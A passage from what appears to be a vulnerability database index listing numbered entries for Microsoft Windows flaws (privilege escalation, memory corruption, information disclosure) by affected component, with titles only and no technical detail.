escalation [151097] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151096] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151095] Microsoft Windows up to Server 2019 Defender privilege escalation [151094] Microsoft Windows up to Server 1909 Defender privilege escalation [151091] Microsoft Windows up to Server 2019 DirectX privilege escalation [151078] Microsoft Windows up to Server 2019 GDI+ memory corruption [151077] Microsoft Windows up to Server 2019 GDI+ memory corruption [151064] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151063] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151062] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151061] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151060] Microsoft Windows up to Server 2019 lnk File privilege escalation [149967] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149966] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149963] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149962] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Hyper-V privilege escalation [149961] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149960] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149959] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149958] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149957] Microsoft Windows up to Server 2019 Graphics Component information disclosure [149956] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149955] Microsoft Windows up to Server 2019 GDI memory corruption [149954] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149953] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149952] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149951] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149950] Microsoft Windows up to Server 2019 privilege escalation [149949] Microsoft Windows up to Server 2019 tapisrv.dll privilege escalation [149948] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [149947] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149945] Microsoft Windows 10/10 1607/Server 2016 DirectX privilege escalation [149944] Microsoft Windows up to Server 2019 Win32k privilege escalation [149943] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149942] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [149941] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [149940] Microsoft Windows up to Server 2019 Win32k privilege escalation [149939] Microsoft Windows up to Server 2019 Win32k privilege escalation [149938] Microsoft Windows up to Server 2019 Win32k privilege escalation [149937] Microsoft Windows up to Server 2019 Win32k privilege escalation [149936] Microsoft Windows up to Server 2019 Win32k privilege escalation [149935] Microsoft Windows up to Server 2019 Win32k privilege escalation [149934] Microsoft Windows up to Server 2019 Win32k privilege escalation [149933] Microsoft Windows up to Server 2019 Win32k privilege escalation [149932] Microsoft Windows up to Server 2019 Win32k information disclosure [149931] Microsoft Windows up to Server 2016 Win32k information disclosure [149930] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149929] Microsoft Windows up to Server 2019 DirectX information disclosure [149928] Microsoft Windows 10/Server 2016 DirectX privilege escalation [149927] Microsoft Windows up to Server 2019 Imaging Library memory corruption [149926] Microsoft Windows up to Server 2019 IME privilege escalation [149923] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [149922] Microsoft Windows up to Server 2019 Wireless Network Manager privilege escalation [149921] Microsoft Windows up to Server 2019 Backup Service privilege escalation [149920] Microsoft Windows up to Server 2019 Client License Service privilege escalation [149919] Microsoft Windows up to Server 2019 Telephony Service information disclosure [149913] Microsoft Windows up to Server 2019 Win32k privilege escalation [149910] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [149909] Microsoft Windows up to Server 2019 COM Server privilege escalation [149907] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149906] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149905] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149904] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [149903] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149902] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149901] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149900] Microsoft Windows up to Server 2019 Kernel privilege escalation [149899] Microsoft Windows up to Server 2019 Kernel privilege escalation [149898] Microsoft Windows up to Server 2019 Kernel privilege escalation [149897] Microsoft Windows up to Server 2019 Kernel privilege escalation [149896] Microsoft Windows up to Server 2019 Kernel privilege escalation [149895] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149894] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149893] Microsoft Windows up to Server 2019 Active Directory privilege escalation [149891] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [149890] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [149889] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149888] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [149887] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [149886] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [149884] Microsoft Windows up to Server 2019 Media Foundation memory corruption [149883] Microsoft Windows up to Server 2019 LNK privilege escalation [149882] Microsoft Windows up to Server 2019 memory corruption [149881] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149880] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149312] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149039] Microsoft Windows 10 1803/Server 2019 RDP Session Lockscreen weak authentication [148654] Microsoft Windows up to Server 2019 Memory Section privilege escalation [148653] Microsoft Windows up to Server 2019 Win32k privilege escalation [148652] Microsoft Windows up to Server 2019 Media Service privilege escalation [148651] Microsoft Windows up to Server 2019 Update Notification Manager privilege escalation [148650] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Subsystem for Linux privilege escalation [148649] Microsoft Windows up to Server 2019 Symbolic Link privilege escalation [148648] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [148638] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Win32k privilege escalation [148637] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [148634] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [148631] Microsoft Windows Server 2016/Server 2019 Remote Desktop Gateway privilege escalation [148629] Microsoft Windows up to Server 2019 Hard Link privilege escalation [148627] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [148626] Microsoft Windows Remote Desktop Gateway privilege escalation [148625] Microsoft Windows Remote Desktop Gateway privilege escalation [148614] Microsoft Windows up to Server 2019 GDI+ information disclosure [148613] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148612] Microsoft Windows Remote Desktop Credentials information disclosure [148611] Microsoft Windows up to Server 2016 Graphics Component information disclosure [148610] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148609] Microsoft Windows up to Server 2019 Win32k information disclosure [148608] Microsoft Windows up to Server 2019 Graphics Component information disclosure [148607] Microsoft Windows up to Server 2019 CryptoAPI Crypt32.dll weak authentication [146926] Microsoft Windows XP SP3 Remote Desktop Protocol information disclosure [146924] Microsoft Windows up to Server 2019 Defender memory corruption [146879] Microsoft Windows up to Server 2019 OLE privilege escalation [146878] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [146877] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146876] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146875] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 COM Server privilege escalation [146874] Microsoft Windows 10 1809/Server 2019 Printer Service privilege escalation [146873] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [146872] Microsoft Windows up to Server 2019 Kernel information disclosure [146871] Microsoft Windows up to Server 2019 Kernel information disclosure [146870] Microsoft Windows up to Server 2019 Hyper-V information disclosure [146869] Microsoft Windows up to Server 2019 GDI information disclosure [146868] Microsoft Windows up to Server 2019 GDI information disclosure [146867] Microsoft Windows up to Server 2019 GDI information disclosure [146862] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [146858] Microsoft Windows up to Server 2019 Win32k information disclosure [146857] Microsoft Windows up to Server 2016 Win32k privilege escalation [146855] Microsoft Windows up to Server 2019 Win32k Graphics privilege escalation [146804] Microsoft Windows Media Center XML External Entity [145412] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145402] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145394] Microsoft Windows up to Server 2019 Win32k information disclosure [145393] Microsoft Windows up to Server 2019 GDI information disclosure [145390] Microsoft Windows up to Server 2019 Win32k information disclosure [145388] Microsoft Windows up to Server 2012 R2 Win32k privilege escalation [145386] Microsoft Windows up to Server 2012 R2 DirectWrite information disclosure [145384] Microsoft Windows up to Server 2019 NetLogon Security Feature privilege escalation [145382] Microsoft Windows up to Server 2019 iphlpsvc.dll privilege escalation [145380] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [145379] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145377] Microsoft Windows up to Server 2019 Installer privilege escalation [145375] Microsoft Windows up to Server 2012 R2 OpenType Font Driver ATMFD.dll information disclosure [145374] Microsoft Windows up to Server 2019 DirectWrite information disclosure [145373] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [145372] Microsoft Windows up to Server 2019 Win32k privilege escalation [145370] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [145367] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145366] Microsoft Windows up to Server 2019 Win32k privilege escalation [145365] Microsoft Windows up to Server 2019 Win32k privilege escalation [145364] Microsoft Windows up to Server 2019 Win32k privilege escalation [145363] Microsoft Windows up to Server 2019 Win32k privilege escalation [145362] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Kernel privilege escalation [145361] Microsoft Windows up to Server 2019 privilege escalation [145360] Microsoft Windows up to Server 2019 Certificate Dialog privilege escalation [145359] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [145358] Microsoft Windows up to Server 2019 Netlogon privilege escalation [145357] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145356] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [145355] Microsoft Windows up to Server 2019 Servicing Stack information disclosure [145353] Microsoft Windows 10 1809/10 1903/Server 2019 Data Sharing Service privilege escalation [145352] Microsoft Windows up to Server 2019 Error Reporting information disclosure [145350] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [145349] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145348] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145346] Microsoft Windows up to Server 2019 Kernel information disclosure [145345] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145344] Microsoft Windows up to Server 2019 privilege escalation [145342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k Graphics memory corruption [145341] Microsoft Windows 10 1903/Server 1903 Media Foundation memory corruption [145340] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145334] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145333] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145332] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [145331] Microsoft Windows up to Server 2019 Hyper-V Switch privilege escalation [143118] Microsoft Windows up to Server 2019 IIS memory corruption [143116] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI information disclosure [143115] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [143114] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [143113] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143112] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143103] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [143102] Microsoft Windows up to Server 2019 Power Service umpo.dll privilege escalation [143101] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [143100] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143099] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 NTLMv2 weak encryption [143098] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client information disclosure [143097] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143096] Microsoft Windows up to Server 2019 Kernel information disclosure [143090] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [143089] Microsoft Windows up to Server 2019 rdbss.sys memory corruption [143088] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143084] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143083] Microsoft Windows up to Server 2019 TLS information disclosure [143082] Microsoft Windows up to Server 2019 Hardlink privilege escalation [143081] Microsoft Windows up to Server 2019 Setup privilege escalation [143080] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143077] Microsoft Windows up to Server 2019 Imaging API memory corruption [143076] Microsoft Windows 10 1703/10 1709/10 1803/Server 1803/Server 2019 Hyper-V privilege escalation [143075] Microsoft Windows up to Server 2019 NTLM MIC weak authentication [143071] Microsoft Windows up to Server 2019 MS XML XML External Entity [143063] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [142140] Microsoft Windows Defender File privilege escalation [141652] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [141637] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141631] Microsoft Windows up to Server 2019 SMB Client Driver information disclosure [141630] Microsoft Windows up to Server 2019 memory corruption [141629] Microsoft Windows up to Server 2019 Update Delivery Optimization privilege escalation [141627] Microsoft Windows up to Server 2019 GDI information disclosure [141626] Microsoft Windows up to Server 2019 Win32k privilege escalation [141625] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 DirectX memory corruption [141624] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [141621] Microsoft Windows up to Server 2019 Kernel information disclosure [141620] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [141619] Microsoft Windows up to Server 2019 ALPC privilege escalation [141618] Microsoft Windows up to Server 2019 hdAudio.sys privilege escalation [141617] Microsoft Windows up to Server 2019 Store Installer privilege escalation [141616] Microsoft Windows up to Server 2019 ALPC privilege escalation [141615] Microsoft Windows up to Server 2019 Winlogon privilege escalation [141614] Microsoft Windows up to Server 2019 Compatibility Appraiser privilege escalation [141606] Microsoft Windows up to Server 2019 Win32k privilege escalation [141605] Microsoft Windows up to Server 2019 Hyper-V information disclosure [141604] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141603] Microsoft Windows up to Server 2019 GDI information disclosure [141602] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141601] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141600] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141599] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141598] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141597] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141596] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141595] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141594] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141593] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141592] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141591] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141590] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [141581] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [141580] Microsoft Windows up to Server 2019 Transaction Manager information disclosure [141579] Microsoft Windows up to Server 2016 DirectX information disclosure [141577] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [141575] Microsoft Windows up to Server 2019 lnk File privilege escalation [141563] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141562] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141561] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [141560] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [139972] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139971] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139970] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139969] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139968] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139966] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [139965] Microsoft Windows up to Server 2019 Kernel information disclosure [139964] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139963] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139962] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [139960] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139958] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139955] Microsoft Windows up to Server 2019 SyncController.dll privilege escalation [139949] Microsoft Windows up to Server 2019 XmlLite Runtime XmlLite.dll XML External Entity [139941] Microsoft Windows up to Server 2019 DirectX privilege escalation [139937] Microsoft Windows up to Server 2019 Azure Active Directory information disclosure [139936] Microsoft Windows up to Server 2019 SymCrypt information disclosure [139935] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 NTFS privilege escalation [139934] Microsoft Windows 7 SP1/Server 2018 R2 SP1/Server 2018 SP2 Win32k privilege escalation [139933] Microsoft Windows up to Server 2019 p2pimsvc privilege escalation [139932] Microsoft Windows up to Server 2019 Kernel privilege escalation [139931] Microsoft Windows up to Server 2019 File Signature Security Feature 7PK Security Features [139930] Microsoft Windows up to Server 2019 ALPC privilege escalation [139928] Microsoft Windows up to Server 2019 Kernel privilege escalation [139927] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139926] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139925] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139924] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139923] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Graphics Component information disclosure [139922] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139921] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139920] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139919] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139918] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139917] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139916] Microsoft Windows up to Server 2019 XML Core Services MSXML Parser XML External Entity [139914] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139913] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139912] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Hyper-V Network Switch privilege escalation [139911] Microsoft Windows up to Server 2019 memory corruption [139910] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139909] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139908] Microsoft Windows up to Server 2019 Bluetooth weak encryption [139907] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139906] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139905] Microsoft Windows Server 2008 SP2 DHCP Server memory corruption [139895] Microsoft Windows up to Server 2019 lnk File privilege escalation [139894] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [139893] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139892] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139891] Microsoft Windows up to Server 2019 Font Library privilege escalation [139890] Microsoft Windows up to Server 2019 Font Library privilege escalation [139889] Microsoft Windows up to Server 2019 Font Library privilege escalation [139888] Microsoft Windows up to Server 2019 Font Library privilege escalation [139887] Microsoft Windows up to Server 2019 Font Library privilege escalation [139886] Microsoft Windows up to Server 2019 Font Library privilege escalation [139880] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [139879] Microsoft Windows up to Server 2019 DHCP Client memory corruption [139878] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139876] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139875] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139527] Microsoft Windows PowerShell privilege escalation [137586] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137585] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137584] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137583] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137582] Microsoft Windows ADFS Security Feature 7PK Security Features [137581] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137580] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137579] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137578] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137577] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137576] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137575] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137574] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137573] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137568] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [137567] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137566] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137565] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137564] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137563] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137562] Microsoft Windows up to Server 2019 Win32k information disclosure [137561] Microsoft Windows up to Server 2019 GDI information disclosure [137560] Microsoft Windows up to Server 2019 GDI information disclosure [137559] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137555] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137554] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137553] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137549] Microsoft Windows up to Server 2016 DLL privilege escalation [137544] Microsoft Windows up to Server 2019 Kernel information disclosure [137541] Microsoft Windows up to Server 2019 privilege escalation [137540] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [137539] Microsoft Windows up to Server 2016 DirectX privilege escalation [137538] Microsoft Windows Server 1803/Server 1903/Server 2016/Server 2019 ADFS Security Feature 7PK Security Features [137537] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [137535] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [137533] Microsoft Windows up to Server 2019 SymCrypt privilege escalation [137532] Microsoft Windows DNS Server Data Processing Error [137527] Microsoft Windows up to Server 2019 GDI+ memory corruption [137512] Microsoft Windows up to Server 2019 DHCP memory corruption [136349] Microsoft Windows up to Server 2019 Event Viewer eventvwr.msc information disclosure [136348] Microsoft Windows up to Server 2019 Task Scheduler privilege escalation [136347] Microsoft Windows up to Server 2019 AppXSVC privilege escalation [136345] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [136344] Microsoft Windows up to Server 2019 GDI information disclosure [136343] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136341] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136340] Microsoft Windows up to Server 2019 GDI information disclosure [136337] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [136336] Microsoft Windows up to Server 2019 Kernel privilege escalation [136335] Microsoft Windows up to Server 2019 NTLM 7PK Security Features [136334] Microsoft Windows up to Server 2019 Kernel information disclosure [136326] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136325] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136324] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136323] Microsoft Windows up to Server 2019 memory corruption [136321] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Audio Service privilege escalation [136320] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136319] Microsoft Windows up to Server 2019 Security Credentials 7PK Security Features [136318] Microsoft Windows up to Server 2019 DirectX privilege escalation [136317] Microsoft Windows up to Server 2019 Win32k privilege escalation [136316] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136315] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136314] Microsoft Windows up to Server 2019 Win32k privilege escalation [136313] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136312] Microsoft Windows up to Server 2019 GDI information disclosure [136311] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136310] Microsoft Windows up to Server 2019 GDI information disclosure [136309] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136308] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136306] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136305] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [136304] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136303] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136302] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136301] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136299] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service 7PK Security Features [136298] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136297] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [136296] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136295] Microsoft Windows up to Server 2019 ALPC privilege escalation [136293] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136292] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136291] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136290] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136289] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136288] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136287] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136286] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136285] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136284] Microsoft Windows up to Server 2019 Kernel privilege escalation [136277] Microsoft Windows 7 SP1/2008 R2 SP1 Speech API memory corruption [136276] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136275] Microsoft Windows 10/10 1607/10 1703/10 1709/Server 2016 Hyper-V privilege escalation [136274] Microsoft Windows up to Server 2019 ActiveX memory corruption [136273] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [134744] Microsoft Windows up to Server 2019 GDI information disclosure [134733] Microsoft Windows up to Server 2019 Unified Write Filter privilege escalation [134731] Microsoft Windows up to Server 2019 Symlink privilege escalation [134729] Microsoft Windows up to Server 2019 Storage Service privilege escalation [134725] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134724] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134723] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134722] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134721] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134720] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134719] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134718] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134717] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134716] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134715] Microsoft Windows up to Server 2019 Win32k privilege escalation [134714] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134713] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134712] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134710] Microsoft Windows up to Server 2019 GDI information disclosure [134709] Microsoft Windows up to Server 2019 Kernel privilege escalation [134706] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [134701] Microsoft Windows up to Server 2019 Windows Defender Application Control 7PK Security Features [134700] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [134699] Microsoft Windows up to Server 2019 NDIS ndis.sys privilege escalation [134698] Microsoft Windows up to Server 2019 OLE privilege escalation [134684] Microsoft Windows up to Server 2019 DHCP Server memory corruption [134678] Microsoft Windows up to Server 2019 GDI+ memory corruption [133378] Microsoft Windows 7/8/10/Vista Contact File cross site scripting [133237] Microsoft Windows Admin Center privilege escalation [133236] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133234] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133222] Microsoft Windows up to Server 2019 Remote Registry Service memory corruption [133221] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133220] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133219] Microsoft Windows up to Server 2019 Win32k Memory information disclosure [133218] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133217] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133216] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133215] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [133214] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [133213] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133212] Microsoft 